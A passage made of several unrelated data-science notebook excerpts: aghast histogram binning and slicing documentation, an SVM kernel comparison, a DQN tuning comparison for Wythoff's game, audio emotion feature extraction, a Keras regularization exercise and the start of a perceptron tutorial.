aghast.RealInterval(-10, 10)],
overlapping_fill=aghast.IrregularBinning.all).toCategoryBinning().dump()
aghast.SparseRegularBinning([5, 3, -2, 8, -100], 10).toCategoryBinning().dump()
aghast.FractionBinning(error_method=aghast.FractionBinning.clopper_pearson).toCategoryBinning().dump()
aghast.PredicateBinning(["signal region", "control region"]).toCategoryBinning().dump()
aghast.VariationBinning([aghast.Variation([aghast.Assignment("x", "nominal")]),
aghast.Variation([aghast.Assignment("x", "nominal + sigma")]),
aghast.Variation([aghast.Assignment("x", "nominal - sigma")])]).toCategoryBinning().dump()
```
This technique can also clear up confusion about overflow bins.
```
aghast.RegularBinning(5, aghast.RealInterval(-5, 5), aghast.RealOverflow(
loc_underflow=aghast.BinLocation.above2,
loc_overflow=aghast.BinLocation.above1,
loc_nanflow=aghast.BinLocation.below1
)).toCategoryBinning().dump()
```
## Fancy binning types
You might also be wondering about `FractionBinning`, `PredicateBinning`, and `VariationBinning`.
`FractionBinning` is an axis of two bins: #passing and #total, #failing and #total, or #passing and #failing. Adding it to another axis effectively makes an "efficiency plot."
```
h = aghast.Histogram([aghast.Axis(aghast.FractionBinning()),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(
numpy.array([[ 9, 25, 29, 35, 54, 67, 60, 84, 80, 94],
[ 99, 119, 109, 109, 95, 104, 102, 106, 112, 122]]))))
df = aghast.connect.pandas.topandas(h)
df
df = df.unstack(level=0)
df
df["unweighted", "pass"] / df["unweighted", "all"]
```
`PredicateBinning` means that each bin represents a predicate (if-then rule) in the filling procedure. Aghast doesn't _have_ a filling procedure, but filling-libraries can use this to encode relationships among histograms that a fitting-library can take advantage of, for combined signal-control region fits, for instance. It's possible for those regions to overlap: an input datum might satisfy more than one predicate, and `overlapping_fill` determines which bin(s) were chosen: `first`, `last`, or `all`.
`VariationBinning` means that each bin represents a variation of one of the parameters used to calculate the fill-variables. This is used to determine sensitivity to systematic effects, by varying them and re-filling. In this kind of binning, the same input datum enters every bin.
```
xdata = numpy.random.normal(0, 1, int(1e6))
sigma = numpy.random.uniform(-0.1, 0.8, int(1e6))
h = aghast.Histogram([aghast.Axis(aghast.VariationBinning([
aghast.Variation([aghast.Assignment("x", "nominal")]),
aghast.Variation([aghast.Assignment("x", "nominal + sigma")])])),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(
numpy.concatenate([
numpy.histogram(xdata, bins=10, range=(-5, 5))[0],
numpy.histogram(xdata + sigma, bins=10, range=(-5, 5))[0]]))))
df = aghast.connect.pandas.topandas(h)
df
df.unstack(level=0)
```
## Collections
You can gather many objects (histograms, functions, ntuples) into a `Collection`, partly for convenience of encapsulating all of them in one object.
```
aghast.Collection({"one": fromroot, "two": ghastly_hist}).dump()
```
Not only for convenience: [you can also define](https://github.com/diana-hep/aghast/blob/master/specification.adoc#Collection) an `Axis` in the `Collection` to subdivide all contents by that `Axis`. For instance, you can make a collection of qualitatively different histograms all have a signal and control region with `PredicateBinning`, or all have systematic variations with `VariationBinning`.
It is not necessary to rely on naming conventions to communicate this information from filler to fitter.
## Histogram → histogram conversions
I said in the introduction that aghast does not fill histograms and does not plot histograms, the two things data analysts expect to do. These would be done by user-facing libraries.
Aghast does, however, transform histograms into other histograms, and not just among formats. You can combine histograms with `+`. In addition to adding histogram counts, it combines auxiliary statistics appropriately (if possible).
```
h1 = aghast.Histogram([
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)),
statistics=[aghast.Statistics(
moments=[
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([10])), n=1),
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([20])), n=2)],
quantiles=[
aghast.Quantiles(aghast.InterpretedInlineBuffer.fromarray(numpy.array([30])), p=0.5)],
mode=aghast.Modes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([40]))),
min=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([50]))),
max=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([60]))))])],
aghast.UnweightedCounts(aghast.InterpretedInlineBuffer.fromarray(numpy.arange(10))))
h2 = aghast.Histogram([
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)),
statistics=[aghast.Statistics(
moments=[
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([100])), n=1),
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([200])), n=2)],
quantiles=[
aghast.Quantiles(aghast.InterpretedInlineBuffer.fromarray(numpy.array([300])), p=0.5)],
mode=aghast.Modes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([400]))),
min=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([500]))),
max=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([600]))))])],
aghast.UnweightedCounts(aghast.InterpretedInlineBuffer.fromarray(numpy.arange(100, 200, 10))))
(h1 + h2).dump()
```
The corresponding moments of `h1` and `h2` were matched and added, quantiles and modes were dropped (no way to combine them), and the correct minimum and maximum were picked; the histogram contents were added as well.
Another important histogram → histogram conversion is axis-reduction, which can take three forms:
* slicing an axis, either dropping the eliminated bins or adding them to underflow/overflow (if possible, depends on binning type);
* rebinning by combining neighboring bins;
* projecting out an axis, removing it entirely, summing over all existing bins.
All of these operations use a Pandas-inspired `loc`/`iloc` syntax.
```
h = aghast.Histogram(
[aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(numpy.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90]))))
```
`loc` slices in the data's coordinate system: `1.5` falls in bin index `6`. The first six bins get combined into an underflow bin: `150 = 0 + 10 + 20 + 30 + 40 + 50`.
```
h.loc[1.5:].dump()
```
`iloc` slices by bin index number.
```
h.iloc[6:].dump()
```
Slices have a `start`, `stop`, and `step` (`start:stop:step`). The `step` parameter rebins:
```
h.iloc[::2].dump()
```
Thus, you can slice and rebin as part of the same operation.
Projecting uses the same mechanism, except that `None` passed as an axis's slice projects it.
```
h2 = aghast.Histogram(
[aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5))),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(numpy.arange(100))))
h2.iloc[:, None].dump()
```
Thus, all three axis reduction operations can be performed in a single syntax.
In general, an n-dimensional ghastly histogram can be sliced like an n-dimensional Numpy array. This includes integer and boolean indexing (though that necessarily changes the binning to `IrregularBinning`).
```
h.iloc[[4, 3, 6, 7, 1]].dump()
h.iloc[[True, False, True, False, True, False, True, False, True, False]].dump()
```
`loc` for numerical binnings accepts
* a real number
* a real-valued slice
* `None` for projection
* ellipsis (`...`)
`loc` for categorical binnings accepts (see the sketch after these lists)
* a string
* an iterable of strings
* an _empty_ slice
* `None` for projection
* ellipsis (`...`)
`iloc` accepts
* an integer
* an integer-valued slice
* `None` for projection
* integer-valued array-like
* boolean-valued array-like
* ellipsis (`...`)
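For example, here is a small sketch based on the rules above (the exact layout printed by `dump()` may differ): `loc` with an iterable of strings keeps only the named bins of a categorical axis.
```
h3 = aghast.Histogram(
    [aghast.Axis(aghast.CategoryBinning(["one", "two", "three"]))],
    aghast.UnweightedCounts(
        aghast.InterpretedInlineBuffer.fromarray(numpy.array([5, 3, 2]))))

h3.loc[["one", "three"]].dump()   # keep only the "one" and "three" bins
```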
## Bin counts → Numpy
Frequently, one wants to extract bin counts from a histogram. The `loc`/`iloc` syntax above creates _histograms_ from _histograms_, not bin counts.
A histogram's `counts` property has a slice syntax.
```
allcounts = numpy.arange(12) * numpy.arange(12)[:, None] # multiplication table
allcounts[10, :] = -999 # underflows
allcounts[11, :] = 999 # overflows
allcounts[:, 0] = -999 # underflows
allcounts[:, 1] = 999 # overflows
print(allcounts)
h2 = aghast.Histogram(
[aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5),
aghast.RealOverflow(loc_underflow=aghast.RealOverflow.above1,
loc_overflow=aghast.RealOverflow.above2))),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5),
aghast.RealOverflow(loc_underflow=aghast.RealOverflow.below2,
loc_overflow=aghast.RealOverflow.below1)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(allcounts)))
print(h2.counts[:, :])
```
To get the underflows and overflows, set the slice extremes to `-inf` and `+inf`.
```
print(h2.counts[-numpy.inf:numpy.inf, :])
print(h2.counts[:, -numpy.inf:numpy.inf])
```
Also note that the underflows are now all below the normal bins and overflows are now all above the normal bins, regardless of how they were arranged in the ghast. This allows analysis code to be independent of histogram source.
## Other types
Aghast can attach fit functions to histograms, can store standalone functions, such as lookup tables, and can store ntuples for unweighted fits or machine learning.
### Preprocessing
```
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix, classification_report
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
X = np.random.normal(size=100)
X1 = X[0:50]
X2 = X[50:100]
y = 2 * pow(X,2) + 3.5 + np.random.normal(size=100)
y1 = y[0:50]
y2 = y[50:100]
y1 += 3.7
y2 -= 3.7
plt.xkcd()
plt.figure(figsize=(25, 10))
plt.scatter(X1, y1, cmap=mpl.cm.Paired, marker='o', s=500)
plt.scatter(X2, y2, cmap=mpl.cm.Paired, marker='o', s=500)
plt.xlabel('X', color='green', fontsize=20)
plt.ylabel('y', color='orange', fontsize=20)
plt.title('data with visible but non-linear separation', color='m', fontsize=30)
```
### Support vector machine with a non-linear kernel
```
Z = np.concatenate([np.ones(50), -np.ones(50)])  # class labels: +1 for the first group, -1 for the second
X_train, X_test, Z_train, Z_test = train_test_split(X, Z, test_size=0.5, random_state=42)
svmfit = SVC(C=40, kernel='rbf', gamma=1).fit(X_train.reshape(-1, 1), Z_train)
svmfit.support_
from sklearn.metrics import confusion_matrix, classification_report
conf_mat_train = pd.DataFrame(confusion_matrix(Z_train, svmfit.predict(X_train.reshape(-1,1))).T, index = svmfit.classes_, columns = svmfit.classes_)
conf_mat_train
class_mat_train = classification_report(Z_train, svmfit.predict(X_train.reshape(-1, 1)))
print(class_mat_train)
conf_mat_test = pd.DataFrame(confusion_matrix(Z_test, svmfit.predict(X_test.reshape(-1,1))).T, index = svmfit.classes_, columns = svmfit.classes_)
conf_mat_test
class_mat_test = classification_report(Z_test, svmfit.predict(X_test.reshape(-1, 1)))
print(class_mat_test)
```
### Support vector classifier (linear kernel)
```
svmfit_linear = SVC(kernel='linear', C=40).fit(X_train.reshape(-1, 1), Z_train)
conf_mat_linear_train = pd.DataFrame(confusion_matrix(Z_train, svmfit_linear.predict(X_train.reshape(-1,1))).T, index = svmfit_linear.classes_, columns = svmfit.classes_)
conf_mat_linear_train
class_mat_linear_train = classification_report(Z_train, svmfit_linear.predict(X_train.reshape(-1, 1)))
print(class_mat_linear_train)
conf_mat_linear_test = pd.DataFrame(confusion_matrix(Z_test, svmfit_linear.predict(X_test.reshape(-1,1))).T, index = svmfit_linear.classes_, columns = svmfit_linear.classes_)
conf_mat_linear_test
class_mat_linear_test = classification_report(Z_test, svmfit_linear.predict(X_test.reshape(-1, 1)))
print(class_mat_linear_test)
```
**Therefore, there is no difference between the performance of the linear and non-linear kernels on the training data, but the non-linear kernel outperforms the linear kernel on the test data.**
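As an optional, purely illustrative check (not part of the original notebook), one could plot the decision functions of the two fitted models over a grid of X values to see why the RBF kernel can carve out the middle region while a single linear threshold cannot. This assumes `svmfit` and `svmfit_linear` are the fitted models from the cells above.
```
import numpy as np
import matplotlib.pyplot as plt

# Evaluate both decision functions on a 1-D grid of X values
grid = np.linspace(-3, 3, 300).reshape(-1, 1)
plt.figure(figsize=(8, 3))
plt.plot(grid, svmfit.decision_function(grid), label='rbf kernel')
plt.plot(grid, svmfit_linear.decision_function(grid), label='linear kernel')
plt.axhline(0, color='gray', linestyle='--')  # decision threshold
plt.xlabel('X')
plt.ylabel('decision function')
plt.legend()
plt.show()
```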
# Analysis - exp62 - 72, or more
- I have run a few tuning experiments for the `(s,a) -> v` representation of Wythoff's game.
- In this notebook I compare the best of these head to head.
```
import os
import csv
import optuna
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data
from torchvision import datasets
from torchvision import transforms
import numpy as np
import pandas as pd
from glob import glob
from pprint import pprint
from copy import deepcopy
import matplotlib
import matplotlib.pyplot as plt
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
import seaborn as sns
sns.set(font_scale=1.5)
sns.set_style('ticks')
matplotlib.rcParams.update({'font.size': 16})
matplotlib.rc('axes', titlesize=16)
from notebook_helpers import load_params
from notebook_helpers import load_monitored
from notebook_helpers import join_monitored
from notebook_helpers import score_summary
def load_data(path, model, run_index=None):
runs = range(run_index[0], run_index[1]+1)
exps = []
for r in runs:
        file = os.path.join(path, f"run_{model}_{r}_monitor.csv")
try:
mon = load_monitored(file)
except FileNotFoundError:
mon = None
exps.append(mon)
return exps
def load_hp(name):
return pd.read_csv(name, index_col=False)
def find_best(hp, data, window, score="score"):
scores = []
for r, mon in enumerate(data):
if mon is not None:
full = mon[score]
selected = full[window[0]:window[1]]
x = np.mean(selected)
scores.append(x)
else:
scores.append(np.nan)
best = np.nanargmax(scores)
return scores[best], hp[best:best+1]
def find_worst(hp, data, window, score="score"):
scores = []
for r, mon in enumerate(data):
if mon is not None:
full = mon[score]
selected = full[window[0]:window[1]]
x = np.mean(selected)
scores.append(x)
else:
scores.append(np.nan)
    worst = np.nanargmin(scores)  # index of the lowest-scoring run
    return scores[worst], hp[worst:worst+1]
```
# HP
## Grid search
- exp68 was the best.
```
path = "/Users/qualia/Code/azad/data/wythoff/exp68/"
hp = load_hp(os.path.join(path,"grid.csv"))
# Find the best model + hp
models = ["DQN_xy1", "DQN_xy2", "DQN_xy3", "DQN_xy4", "DQN_xy5"]
index = (0, 250)
for model in models:
data = load_data(path, model, run_index=index)
score, best_hp = find_best(hp, data, (200,250))
print(f"{model} - {score}:\n{best_hp}\n---")
```
## Optuna
- exp71 was the best
```
path = "/Users/qualia/Code/azad/data/wythoff/exp71/"
# Load the optuna study object, and extract the interesting bits
study = torch.load(os.path.join(path, "run_0.torch"))
study.trials_dataframe().sort_values("value", ascending=False).head(1)
study.best_value
study.best_params
# Build network for optuna
in_features = 4 # Initial
out_features = [10, 11, 13]
layers = []
for out_feature in out_features:
layers.append(nn.Linear(in_features, out_feature))
layers.append(nn.ReLU())
in_features = deepcopy(out_feature)
# Output layer topo is fixed
layers.append(nn.Linear(in_features, 1))
# Define the nn
class DQN_optuna(nn.Module):
def __init__(self):
super(DQN_optuna, self).__init__()
self.layers = nn.Sequential(*layers)
def forward(self, x):
return self.layers(x)
print(DQN_optuna())
```
# Head2Head
- Compare these two best solutions on the same task and seed.
```
from azad.exp.alternatives import wythoff_dqn2
seed_value = 1387
num_episodes = 2500
game = 'Wythoff15x15'
batch_size = 50
memory_capacity = 1e3
anneal = True
update_every = 10
double = True
clip_grad = True
monitor = ('episode', 'loss', 'score', 'Q', 'prediction_error', 'advantage', 'epsilon_e')
```
### Run
```
# Grid
result1 = wythoff_dqn2(
epsilon=0.1,
gamma=0.4,
learning_rate=0.027755,
network='DQN_xy3',
game=game,
num_episodes=num_episodes,
batch_size=batch_size,
memory_capacity=memory_capacity,
anneal=anneal,
update_every=update_every,
double=double,
clip_grad=clip_grad,
seed=seed_value,
monitor=monitor
)
# Optuna
result2 = wythoff_dqn2(
epsilon=0.33,
gamma=0.27,
learning_rate=0.49,
network=DQN_optuna,
game=game,
num_episodes=num_episodes,
batch_size=batch_size,
memory_capacity=memory_capacity,
anneal=anneal,
update_every=update_every,
double=double,
clip_grad=clip_grad,
seed=seed_value,
monitor=monitor,
)
```
### Visualize
```
# ---
mon = result1["monitored"]
fig, ax1 = plt.subplots(figsize=(8,3))
_ = ax1.plot(mon['episode'], mon['score'], color='red', alpha=1)
_ = plt.title(f"Result 1 - {np.max(mon['score']).round(2)}")
_ = ax1.set_ylabel("Optimal score", color="red")
_ = ax1.set_xlabel("Episode")
_ = ax1.set_ylim(0, 1)
_ = ax2 = ax1.twinx()
_ = ax2.plot(mon['episode'], np.log10(mon['loss']), color='black', alpha=1)
_ = ax2.tick_params(axis='y')
_ = ax2.set_ylabel('log10(loss)', color="black")
sns.despine()
# ---
mon = result2["monitored"]
fig, ax1 = plt.subplots(figsize=(8,3))
_ = ax1.plot(mon['episode'], mon['score'], color='red', alpha=1)
_ = plt.title(f"Result 2 - {np.max(mon['score']).round(2)}")
_ = ax1.set_ylabel("Optimal score", color="red")
_ = ax1.set_xlabel("Episode")
_ = ax1.set_ylim(0, 1)
_ = ax2 = ax1.twinx()
_ = ax2.plot(mon['episode'], np.log10(mon['loss']), color='black', alpha=1)
_ = ax2.tick_params(axis='y')
_ = ax2.set_ylabel('log10(loss)', color="black")
sns.despine()
```
This notebook contains code to extract features from the audio signals.
```
import os
import pickle
import soundfile as sf
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.style as ms
from tqdm import tqdm
import librosa
import math
import random
import pandas as pd
import IPython.display
import librosa.display
ms.use('seaborn-muted')
%matplotlib inline
data_dir = r'D:\pre-processed/'
labels_df_path = '{}df_iemocap.csv'.format(data_dir)
audio_vectors_path = '{}audio_vectors_1.pkl'.format(data_dir)
labels_df = pd.read_csv(labels_df_path)
audio_vectors = pickle.load(open(audio_vectors_path, 'rb'))
random_file_name = list(audio_vectors.keys())[random.choice(range(len(audio_vectors.keys())))]
y = audio_vectors[random_file_name]
sr = 44100
plt.figure(figsize=(15,2))
librosa.display.waveplot(y, sr=sr, max_sr=1000, alpha=0.25, color='r')
print('Signal mean = {:.5f}'.format(np.mean(abs(y))))
print('Signal std dev = {:.5f}'.format(np.std(y)))
rmse = librosa.feature.rms(y + 0.0001)[0]
plt.figure(figsize=(15,2))
plt.plot(rmse)
plt.ylabel('RMSE')
print('RMSE mean = {:.5f}'.format(np.mean(rmse)))
print('RMSE std dev = {:.5f}'.format(np.std(rmse)))
from IPython.display import Audio
Audio(y, rate=44100)
silence = 0
for e in rmse:
if e <= 0.4 * np.mean(rmse):
silence += 1
print(silence/float(len(rmse)))
y_harmonic, y_percussive = librosa.effects.hpss(y)
np.mean(y_harmonic)
autocorr = librosa.core.autocorrelate(y)
np.max(autocorr)
cl = 0.45 * np.mean(abs(y))
center_clipped = []
for s in y:
if s >= cl:
center_clipped.append(s - cl)
elif s <= -cl:
center_clipped.append(s + cl)
elif np.abs(s) < cl:
center_clipped.append(0)
new_autocorr = librosa.core.autocorrelate(np.array(center_clipped))
np.max(new_autocorr)
columns = ['wav_file', 'label', 'sig_mean', 'sig_std', 'rmse_mean', 'rmse_std', 'silence', 'harmonic', 'auto_corr_max', 'auto_corr_std']
df_features = pd.DataFrame(columns=columns)
```
The following blocks build feature vectors for all the files
```
emotion_dict = {'ang': 0,
'hap': 1,
'exc': 2,
'sad': 3,
'fru': 4,
'fea': 5,
'sur': 6,
'neu': 7,
'xxx': 8,
'oth': 8}
data_dir = r'D:\pre-processed/'
labels_path = '{}df_iemocap.csv'.format(data_dir)
audio_vectors_path = '{}audio_vectors_'.format(data_dir)
labels_df = pd.read_csv(labels_path)
for sess in (range(1, 6)):
audio_vectors = pickle.load(open('{}{}.pkl'.format(audio_vectors_path, sess), 'rb'))
for index, row in tqdm(labels_df[labels_df['wav_file'].str.contains('Ses0{}'.format(sess))].iterrows()):
try:
wav_file_name = row['wav_file']
# check wave file name
print(wav_file_name)
label = emotion_dict[row['emotion']]
y = audio_vectors[wav_file_name]
feature_list = [wav_file_name, label] # wav_file, label
sig_mean = np.mean(abs(y))
feature_list.append(sig_mean) # sig_mean
feature_list.append(np.std(y)) # sig_std
            rmse = librosa.feature.rms(y + 0.0001)[0]  # librosa.feature.rmse was renamed to rms
feature_list.append(np.mean(rmse)) # rmse_mean
feature_list.append(np.std(rmse)) # rmse_std
silence = 0
for e in rmse:
if e <= 0.4 * np.mean(rmse):
silence += 1
silence /= float(len(rmse))
feature_list.append(silence) # silence
y_harmonic = librosa.effects.hpss(y)[0]
feature_list.append(np.mean(y_harmonic) * 1000) # harmonic (scaled by 1000)
# based on the pitch detection algorithm mentioned here:
# http://access.feld.cvut.cz/view.php?cisloclanku=2009060001
cl = 0.45 * sig_mean
center_clipped = []
for s in y:
if s >= cl:
center_clipped.append(s - cl)
elif s <= -cl:
center_clipped.append(s + cl)
elif np.abs(s) < cl:
center_clipped.append(0)
auto_corrs = librosa.core.autocorrelate(np.array(center_clipped))
feature_list.append(1000 * np.max(auto_corrs)/len(auto_corrs)) # auto_corr_max (scaled by 1000)
feature_list.append(np.std(auto_corrs)) # auto_corr_std
df_features = df_features.append(pd.DataFrame(feature_list, index=columns).transpose(), ignore_index=True)
        except Exception as e:
            print('Exception occurred: {}'.format(e))
df_features.to_csv(r'D:\pre-processed/audio_features.csv', index=False)
```
# Regularization
In this notebook we will look at an overfitting problem and deal with it by adding two kinds of regularization: l2 weight decay on the parameters and dropout.
## The dataset
The dataset is generated with a sklearn function. It consists of two concentric circles with random noise:
```
# generate two circles dataset
from sklearn.datasets import make_circles
from matplotlib import pyplot as plt
import pandas as pd
# generate 2d classification dataset
X, y = make_circles(n_samples=100, noise=0.1, random_state=1)
# scatter plot, dots colored by class value
df = pd.DataFrame(dict(x=X[:,0], y=X[:,1], label=y))
colors = {0:'red', 1:'blue'}
fig, ax = plt.subplots()
grouped = df.groupby('label')
for key, group in grouped:
group.plot(ax=ax, kind='scatter', x='x', y='y', label=key, color=colors[key])
plt.show()
```
<font color=red><b>Generate the dataset. Use 100 samples and noise = 0.1. Set a random state. Create train and test sets. The training set must contain only 30% of the samples.
</font>
```
# generate 2d classification dataset
X, y = make_circles(n_samples=100, noise=0.1, random_state=1)
# split into train and test
n_train = 30
trainX, testX = X[:n_train, :], X[n_train:, :]
trainy, testy = y[:n_train], y[n_train:]
```
## Building the model
We will use a very basic model architecture. In this case it will be:
- Dense with 500 units, relu activated
- Dense with a single unit, sigmoid activated
- Use binary crossentropy as the loss function and adam as the optimizer. Add accuracy as the metric.
<font color=red><b>Build the model and train it
</font>
```
import tensorflow as tf
physical_devices = tf.config.experimental.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
tf.keras.backend.clear_session()
from tensorflow.keras.layers import Dense
from tensorflow.keras.models import Sequential
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
history = model.fit(trainX, trainy, validation_data=(testX, testy), epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
```
### Overfitting?
Let's see if the model overfits:
```
# plot history
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='test')
plt.legend()
plt.show()
```
<font color=red><b>Plot the losses for both validation and train
</font>
```
# plot history
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.legend()
plt.show()
```
## Weight Decay regularization
We will use the L2 vector norm, also called weight decay, with a regularization parameter $\lambda$. It can be written either as a penalty added to the loss,
$$\mathcal{J}(W; X, y) + \frac{1}{2}\cdot\lambda\cdot ||W||^2$$
or as the equivalent update rule,
$$\omega_{t+1} = \omega_t -\alpha\cdot\nabla_{\omega}\mathcal{J} - \alpha\cdot\lambda\cdot \omega_t$$
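As a minimal, purely illustrative sketch (made-up numbers, not part of the exercise), the update rule above can be written directly in NumPy; `grad` is just a stand-in for the gradient of the data loss:
```
import numpy as np

rng = np.random.default_rng(0)
w = rng.normal(size=5)        # current parameters
grad = rng.normal(size=5)     # stand-in for the gradient of the data loss
alpha, lam = 0.1, 0.01        # learning rate and regularization strength

w_plain = w - alpha * grad                    # ordinary gradient step
w_decay = w - alpha * grad - alpha * lam * w  # extra term shrinks w towards zero
print(np.linalg.norm(w_plain), np.linalg.norm(w_decay))
```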
<font color=red><b>Build the same model structure, but add an l2 kernel regularizer on the big dense layer. Use an arbitrary 0.001 value for lambda
</font>
```
from tensorflow.keras.regularizers import l2
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu', kernel_regularizer=l2(0.001)))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
model.fit(trainX, trainy, epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
```
Let's check more than one lambda this time:
<font color=red><b>Build a grid search structure to train models at each lambda value. Include accuracies in a list
</font>
```
# grid search values
values = [1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6]
all_train, all_test = list(), list()
for param in values:
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu', kernel_regularizer=l2(param)))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
model.fit(trainX, trainy, epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Param: %f, Train: %.3f, Test: %.3f' % (param, train_acc, test_acc))
all_train.append(train_acc)
all_test.append(test_acc)
# plot train and test means
plt.semilogx(values, all_train, label='train', marker='o')
plt.semilogx(values, all_test, label='test', marker='o')
plt.legend()
plt.show()
```
## Dropout
Let's try another source of regularization: Dropout. It consists of randomly dropping some of the previous layer's units at training time.
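For intuition, here is a minimal NumPy sketch of (inverted) dropout applied to a toy activation vector; Keras' `Dropout` layer does the equivalent internally during training, so this is purely illustrative:
```
import numpy as np

rng = np.random.default_rng(0)
a = rng.normal(size=10)            # activations of the previous layer
rate = 0.4                         # fraction of units to drop
mask = rng.random(10) >= rate      # keep roughly 60% of the units
a_dropped = a * mask / (1 - rate)  # rescale so the expected activation is unchanged
print(a_dropped)
```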
<font color=red><b>Add a dropout of 0.4 to the big dense layer.
</font>
```
from tensorflow.keras.layers import Dropout
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu'))
model.add(Dropout(0.4))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
history = model.fit(trainX, trainy, validation_data=(testX, testy), epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
# plot history
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='test')
plt.legend()
plt.show()
```
<font color=red><b>Plot the losses for both validation and train
</font>
```
# plot history
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.legend()
plt.show()
```
<a href="https://colab.research.google.com/github/AxlSyr/ArtificialIntelligenceUAEM/blob/master/TareaPerceptron.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Team:
**Reynoso Gomez Luis Alfredo**
**Reyes Flores Axel**
# A brief introduction to the Perceptron
---
The simple Perceptron, also known as a **Single-Layer Neural Network**, is a binary classification algorithm created by Frank Rosenblatt, building on the neuronal model developed by Warren McCulloch and Walter Pitts in 1943.
---
The neuron receives external stimuli (the inputs), each with a different importance (weight), through an activation function. If the aggregated stimulus exceeds a certain threshold, the neuron fires.
Mathematically, we define x as the vector of stimuli and w as the vector of weights, both of dimension m, and z as the net input:
$$ w=\begin{bmatrix} w_1 \\ \vdots \\ w_m \end{bmatrix},\qquad x=\begin{bmatrix} x_1 \\ \vdots \\ x_m \end{bmatrix}$$
$$ z = w^T x = w_1 x_1 + \dots + w_m x_m $$
---
The perceptron ϕ(z) is considered active when z is greater than or equal to the threshold θ, and inactive otherwise. Formally, this is a [step function](https://es.wikipedia.org/wiki/Funci%C3%B3n_escal%C3%B3n_de_Heaviside).
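As a minimal illustrative sketch (with made-up numbers), the net input z and the step activation can be computed like this:
```
import numpy as np

w = np.array([0.2, -0.5, 0.8])    # hypothetical weights
x = np.array([1.0, 2.0, 0.5])     # hypothetical inputs
theta = 0.0                       # threshold
z = np.dot(w, x)                  # net input
output = 1 if z >= theta else -1  # step activation
print(z, output)
```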
### The learning rule
The perceptron has a fairly simple learning rule that lets it progressively adjust the weight values (w). It follows these steps:
1. Initialize the weights to 0 (zero) or to small random values.
2. For each training sample x(i):
* Compute the output value ŷ.
* Update the weights.
The weights are updated by increasing or decreasing them by Δw_j:
$$w_j=w_j+\Delta w_j$$
$$\Delta w_j=\eta\,(y^{(i)}-\hat{y}^{(i)})\,x_j^{(i)}$$
Where:
* $\eta$ is the learning rate, a value between 0 and 1.0
* $y^{(i)}$ is the true value
* $\hat{y}^{(i)}$ is the computed output value (note the hat on the y)
* $x_j^{(i)}$ is the corresponding sample value
This means that if the true value and the computed value are the same, w is not updated, i.e. Δw_j = 0. If the prediction was wrong, however, the weight is updated by the difference between the true and predicted values, scaled by the sample value and the learning rate.
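A small worked example of a single update (the numbers are hypothetical):
```
import numpy as np

eta = 0.1
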